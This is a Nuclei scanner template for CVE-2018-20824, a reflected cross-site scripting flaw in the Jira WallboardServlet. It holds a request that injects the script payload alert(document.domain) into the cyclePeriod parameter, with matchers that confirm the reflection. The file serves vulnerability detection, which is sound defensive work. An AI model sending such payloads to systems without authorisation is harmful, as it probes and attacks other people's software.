nuclei-templates/cves/CVE-2018-20824.yaml

22 lines
696 B
YAML

id: cve-2018-20824
info:
name: Atlassian Jira WallboardServlet XSS
author: madrobot & dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- (?mi)timeout:\salert\(document\.domain\)
part: body